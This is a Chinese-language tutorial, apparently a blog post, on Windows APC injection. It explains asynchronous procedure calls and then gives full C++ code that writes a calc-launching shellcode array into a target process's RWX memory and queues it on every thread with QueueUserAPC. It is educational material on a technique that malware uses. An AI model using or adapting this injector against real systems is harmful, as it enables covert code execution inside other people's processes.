16-APC注入（APC Injection）

一、前言

1.1 APC（Asyncroneus Procedure Call）

官方文档：异步过程调用 - Win32 apps | Microsoft Learn

APC中文名称为异步过程调用， APC是一个链状的数据结构，可以让一个线程在其本应该的执行步骤前执行其他代码，每个线程都维护这一个APC链。当线程从等待状态苏醒后，会自动检测自己得APC队列中是否存在APC过程

简单的说，由于在线程执行过程中，其他线程无法干预当前执行线程(占用cpu)，如果需要干预当前执行线程的操作，就需要提供一种让当前执行的线程自身去调用的机制，windows实现了一种称之为APC的技术，这种技术可以通过插入队列(执行信息)让当前执行的线程在一定条件下自己去调用，这样就实现了异步操作。

1.2 线程的控制

学习过操作系统的人都知道，在现代操作系统中，大部分都实现了内核级线程，因此线程是作为CPU调度的基本单位。

线程在执行时是占据着 CPU 的资源，其他线程或进程不能直接“杀掉”或“挂起”它。虽然操作系统提供了一些 API 来控制线程的状态（如 TerminateThread、SuspendThread 和 ResumeThread），这些操作并不是直接通过线程本身的代码来实现的，而是通过操作系统的调度机制来管理。

1.3 改变线程的行为

一个线程如何改变当前CPU执行的线程的行为呢？Windows提供了一个API，让当前CPU执行的线程自己去调用,这个函数就是APC (Asyncroneus Procedure Call),即异步过程调用。APC 允许你将一个函数排队到某个线程的 APC 队列中，当该线程处于可执行状态时，操作系统会在适当的时机调用这个函数。

二、APC注入

2.1 原理

既然Windows提供了这样的一种机制，那我们就可以往目标进程的线程的APC队列中插入APC函数（也称APC过程），当目标线程从等待状态苏醒后，首先检测自己的APC队列中是否存在APC过程，如果存在，就先执行APC过程然后再执行本身的执行流程。

当然为了提高命中率可以向进程的所有线程中添加APC过程。然后促使线程从休眠中恢复就可以实现APC注入。

APC注入既可以实现shellcode注入，也可以实现DLL注入，本文只介绍shellcode注入；不仅能远程注入，也能本进程注入，本文只介绍远程注入。

2.2 流程

1. 使用OpenProcess打开目标进程，获得其句柄

2. 使用 VirtualAllocEx+WriteProcessMemory 在远程进程中申请一块RWX内存区域，写入shellcode

3. 使用自定义函数 GetAllThreadIdByProcessId 根据目标PID获得其所有线程的TID（获取一个线程的TID也行，获得所有TID的目的是提高成功执行的几率）

4. 向当前线程的异步过程调用(APC)队列添加一个执行shellcode的任务

⚠注意：APC注入的的原始实现是“被动”执行APC函数，这里的“被动”是指需要目标的CPU执行我们注入的目标进程的线程，如果目标线程一直不被执行，那就不会触发我们的APC函数。

2.3 代码实现

#include <Windows.h>
#include <TlHelp32.h>
#include <vector>
#include <iostream>

// 获取指定进程 ID 的所有线程 ID
std::vector<DWORD> GetAllThreadIdByProcessId(DWORD processId) {
    std::vector<DWORD> threadIds;
    HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
    if (hSnapshot == INVALID_HANDLE_VALUE) {
        return threadIds; // 返回空列表
    }

    THREADENTRY32 te;
    te.dwSize = sizeof(THREADENTRY32);

    // 遍历线程快照
    if (Thread32First(hSnapshot, &te)) {
        do {
            if (te.th32OwnerProcessID == processId) {
                threadIds.push_back(te.th32ThreadID);
            }
        } while (Thread32Next(hSnapshot, &te));
    }

    CloseHandle(hSnapshot);
    return threadIds;
}

int main() {
    
    // calc shellcode
    unsigned char shellcode[] = {
    0x50, 0x51, 0x52, 0x53, 0x56, 0x57, 0x55, 0x6A, 0x60, 0x5A,
0x68, 0x63, 0x61, 0x6C, 0x63, 0x54, 0x59, 0x48, 0x83, 0xEC,
0x28, 0x65, 0x48, 0x8B, 0x32, 0x48, 0x8B, 0x76, 0x18, 0x48,
0x8B, 0x76, 0x10, 0x48, 0xAD, 0x48, 0x8B, 0x30, 0x48, 0x8B,
0x7E, 0x30, 0x03, 0x57, 0x3C, 0x8B, 0x5C, 0x17, 0x28, 0x8B,
0x74, 0x1F, 0x20, 0x48, 0x01, 0xFE, 0x8B, 0x54, 0x1F, 0x24,
0x0F, 0xB7, 0x2C, 0x17, 0x8D, 0x52, 0x02, 0xAD, 0x81, 0x3C,
0x07, 0x57, 0x69, 0x6E, 0x45, 0x75, 0xEF, 0x8B, 0x74, 0x1F,
0x1C, 0x48, 0x01, 0xFE, 0x8B, 0x34, 0xAE, 0x48, 0x01, 0xF7,
0x99, 0xFF, 0xD7, 0x48, 0x83, 0xC4, 0x30, 0x5D, 0x5F, 0x5E,
0x5B, 0x5A, 0x59, 0x58, 0xC3
    };

    LPVOID lpShellcode = NULL;
    HANDLE hProcess = NULL;

    //用户输入PID
    DWORD PID;
    std::cout << "请输入目标进程的PID：";
    std::cin >> PID;

    // 打开目标进程，获得其句柄
    hProcess = OpenProcess(PROCESS_ALL_ACCESS, 0, PID);

    // 在远程进程中申请一块RWX内存区域，写入shellcode
    lpShellcode = VirtualAllocEx(hProcess, NULL, sizeof(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    WriteProcessMemory(hProcess, lpShellcode, shellcode, sizeof(shellcode), NULL);

    // 根据目标PID获得其所有线程的TID
    std::vector<DWORD> threadIds = GetAllThreadIdByProcessId(PID);
    for (DWORD threadId : threadIds) {
        HANDLE hThread = OpenThread(THREAD_ALL_ACCESS, FALSE, threadId);
        if (hThread != nullptr) {
            std::cout << "Opened thread ID: " << threadId << std::endl;

            // 向当前线程的异步过程调用(APC)队列添加一个执行shellcode的任务
            QueueUserAPC((PAPCFUNC)lpShellcode, hThread, NULL);
            CloseHandle(hThread); // 记得关闭句柄
        }
        else {
            std::cerr << "Failed to open thread ID: " << threadId << std::endl;
        }
    }

    CloseHandle(hProcess);
    return 0;
}

recording.gif

三、参考资料

1、 APC注入以及几种实现方式 - 先知社区 (aliyun.com)

2、 总结加载Shellcode的各种方式 - 亨利其实很坏 - 博客园